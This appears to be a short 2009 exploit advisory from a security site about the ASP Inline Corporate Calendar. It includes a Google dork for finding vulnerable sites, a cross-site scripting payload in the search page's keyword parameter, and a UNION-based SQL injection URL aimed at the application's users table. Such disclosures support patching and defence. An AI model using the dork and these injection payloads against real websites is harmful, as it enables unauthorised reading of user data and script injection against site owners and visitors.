ASP Inline Corporate Calendar (SQL/XSS) Multiple Remote Vulnerabilities

2009.06.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89
CWE-79

[+] Script : ASP Talk [+] Exploit Type : Multiple Exploits (SQL/CSS) [+] Google Dork : intitle:"ASP inline corporate calendar" inurl:.asp?id= [+] Contact : blackbeard-sql A.T hotmail.fr --//--> Exploit : 1)Cross site scripting : http://[website]/[script]/search.asp?keyword=<script>alert('bl@ckbe@rd');</script>&SearchIn=All post = <script>alert('Bl@clbe@rD Is Here');</script> 2) Remote sql injection Exploit : http://[website]/[script]/active_appointments.asp?sortby=Event_Title&order=DESC+union+select+(number of columns)+from+users [peace xD]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top